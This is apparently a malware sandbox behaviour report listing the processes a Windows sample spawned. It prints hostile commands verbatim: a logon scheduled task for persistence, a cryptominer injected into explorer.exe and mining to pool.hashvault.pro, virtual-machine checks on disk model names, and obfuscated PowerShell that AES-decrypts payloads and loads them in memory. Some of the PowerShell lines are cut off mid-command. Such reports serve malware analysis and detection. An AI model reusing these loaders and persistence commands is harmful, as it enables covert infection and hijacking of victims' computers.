Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:fululhvbhhgj{param([outputtype([type])][parameter(position=0)][type[]]$nnulhbqztprdhv,[parameter(position=1)][type]$ofcpxnfkpy)$qvwxxlmoanu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+'me'+[char](109)+'o'+[char](114)+''+[char](121)+''+[char](77)+'odul'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+'e'+'t'+[char](121)+''+[char](112)+''+'e'+'','c'+[char](108)+''+'a'+'ss'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+''+[char](105)+''+[char](99)+''+[char](44)+''+'s'+''+[char](101)+''+[char](97)+''+'l'+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+'s'+[char](105)+''+[char](67)+'l'+'a'+'s'+[char](115)+','+[char](65)+''+[char](117)+''+[char](116)+'oc'+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qvwxxlmoanu.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+[char](101)+''+'c'+''+'i'+''+[char](97)+''+[char](108)+'n'+[char](97)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+'by'+[char](83)+''+'i'+''+[char](103)+''+[char](44)+'pu'+'b'+''+'l'+'i'+'c'+'',[reflection.callingconventions]::standard,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+[char](117)+''+[char](110)+'t'+'i'+''+[char](109)+''+[char](101)+',ma'+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$qvwxxlmoanu.definemethod(''+'i'+''+'n'+''+[char](118)+''+[char](111)+''+[char](107)+''+[char](101)+'','p'+'u'+''+[char](98)+'l'+[char](105)+'c'+','+''+[char](72)+''+[char](105)+'de'+'b'+''+'y'+''+'s'+'i'+[char](103)+','+[char](78)+''+'e'+''+'w'+''+'s'+''+[char](108)+'ot'+[char](44)+''+'v'+''+'i'+''+'r'+'t'+[char](117)+''+'a'+'l',$ofcpxnfkpy,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+'u'+''+[char](110)+''+'t'+''+[char](105)+'m'+[char](101)+''+','+'m'+'a'+'n'+[char](97)+'g'+[char](101)+''+'d'+'');write-output $qvwxxlmoanu.createtype();}$iknksxdttnkac=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+''+'t'+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+'ic'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+''+'t'+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+'.'+'u'+'n'+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+''+'n'+''+[char](97)+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+''+'h'+''+[char](111)+''+[char](10
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:kvehnqwssgcg{param([outputtype([type])][parameter(position=0)][type[]]$mhkvivexzpriho,[parameter(position=1)][type]$qoutaubbtf)$msesbhasmah=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+'e'+'f'+[char](108)+''+'e'+''+'c'+'te'+'d'+'d'+[char](101)+'le'+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+''+[char](101)+''+'m'+''+[char](111)+'ry'+[char](77)+''+[char](111)+'dul'+'e'+'',$false).definetype(''+[char](77)+'y'+[char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[char](97)+''+'t'+''+'e'+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+'c'+''+'l'+''+[char](97)+''+'s'+'s'+','+''+[char](80)+''+[char](117)+''+[char](98)+'l'+[char](105)+'c'+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+''+[char](115)+''+[char](105)+'c'+[char](108)+''+[char](97)+''+[char](115)+'s,'+[char](65)+'u'+[char](116)+'o'+'c'+'la'+[char](115)+''+[char](115)+'',[multicastdelegate]);$msesbhasmah.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+'e'+'c'+'i'+''+[char](97)+''+[char](108)+''+[char](78)+'ame'+[char](44)+''+[char](72)+''+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+[char](99)+'',[reflection.callingconventions]::standard,$mhkvivexzpriho).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+'e'+[char](100)+'');$msesbhasmah.definemethod(''+[char](73)+'nv'+'o'+'k'+'e'+'',''+[char](80)+''+'u'+''+'b'+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+'i'+'d'+'eb'+'y'+'s'+'i'+'g'+','+''+[char](78)+''+'e'+'w'+[char](83)+''+'l'+''+[char](111)+''+'t'+''+','+''+'v'+''+'i'+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qoutaubbtf,$mhkvivexzpriho).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+'t'+[char](105)+'m'+[char](101)+''+','+''+[char](77)+'ana'+[char](103)+''+[char](101)+'d');write-output $msesbhasmah.createtype();}$gffwslpcsixef=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+'s'+[char](116)+'e'+[char](109)+''+'.'+''+'d'+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+'i'+''+'c'+''+[char](114)+'o'+[char](115)+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+'i'+'n'+'32.'+[char](85)+'n'+[char](115)+''+[char](97)+''+'f'+''+[char](101)+'na'+[char](116)+'i'+[char](118)+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+''+[char](111)+''+[char](100)+'s');$xrdavnignzllon=$gffwslpcsixef.getmethod(''+'g'+''+'e'+''+[char](116)+''+[char](80)+''+'r'+'o'+[char](99)+''+'a'+''+[cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:yrwhxohynmxl{param([outputtype([type])][parameter(position=0)][type[]]$mjbpafoyxdmllp,[parameter(position=1)][type]$mbxclwmzji)$qsxeicuzieu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+[char](116)+'e'+[char](100)+''+[char](68)+'e'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+'m'+'e'+'m'+'o'+[char](114)+''+'y'+''+[char](77)+'o'+'d'+''+[char](117)+''+'l'+''+[char](101)+'',$false).definetype(''+[char](77)+''+'y'+'d'+'e'+''+'l'+'e'+[char](103)+'a'+[char](116)+'e'+[char](84)+''+'y'+''+'p'+'e',''+[char](67)+''+'l'+'a'+'s'+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+'l'+'ic'+[char](44)+''+[char](83)+''+[char](101)+''+[char](97)+'le'+'d'+','+[char](65)+''+'n'+'sic'+'l'+'a'+'s'+''+[char](115)+''+[char](44)+''+'a'+'ut'+[char](111)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qsxeicuzieu.defineconstructor(''+[char](82)+''+[char](84)+'sp'+[char](101)+''+[char](99)+''+'i'+'a'+[char](108)+''+[char](78)+''+[char](97)+''+[char](109)+'e,h'+'i'+''+'d'+'e'+'b'+''+'y'+'s'+[char](105)+''+'g'+''+[char](44)+''+[char](80)+'ub'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+'i'+''+'m'+''+'e'+''+[char](44)+''+'m'+'a'+[char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsxeicuzieu.definemethod('i'+[char](110)+'v'+'o'+''+[char](107)+''+'e'+'','p'+[char](117)+''+[char](98)+''+[char](108)+'i'+'c'+''+','+''+'h'+'i'+'d'+''+'e'+'b'+[char](121)+''+[char](83)+'i'+'g'+''+','+''+'n'+''+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+[char](116)+','+'v'+''+[char](105)+''+'r'+'t'+[char](117)+'a'+[char](108)+'',$mbxclwmzji,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+'u'+''+'n'+''+[char](116)+''+'i'+''+'m'+''+[char](101)+''+[char](44)+''+[char](77)+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');write-output $qsxeicuzieu.createtype();}$xabpoaxizgegr=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and 